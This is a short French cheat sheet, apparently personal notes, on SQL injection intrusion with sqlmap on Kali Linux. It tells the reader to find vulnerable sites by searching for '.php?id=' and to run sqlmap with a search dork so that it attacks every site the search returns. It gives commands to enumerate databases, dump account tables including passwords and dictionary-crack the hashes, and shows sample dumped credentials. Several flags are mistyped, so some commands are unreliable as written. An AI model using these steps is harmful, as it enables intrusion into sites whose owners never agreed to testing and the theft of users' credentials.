SQLMAP DATABASE

INTRUSIONS SQL SQLMAP AVEC KALI



-Test url :
http://webscantest.com/
-Chercher des sites avec des failles :
taper dans la barre de recherche → ".php?id="
-Tester faille possible sur url en ajoutant un ' en fin d’url
ou lancer la commande ‘sudo sqlmap –-dump-all -g "inurl.reservations.php?id="’
-Commande sqlmap pour tester une url : sqlmap -u https://sitetest.com/test.php --dbs
-Récupérer les tables d’une base
sqlmap -u https://sitetest.com/test.php –tables
sqlmap -u https://sitetest.com/test.php –T –accounts –columns
sqlmap -u https://sitetest.com/test.php –T –accounts –C –valeurtable(fname, lname, passwd), ect) –-dump
réponses →
do you want to hashes to a tempory file for evantual further processing width other tools  y/n ? y
do you want to crack them width a dictionary-based attack  y/n ? y
do you want to use common password suffixes y/n ? n
-------------------------------------------------
fname  | lname | passwd
test      |    user | 9823765fj654123
-------------------------------------------------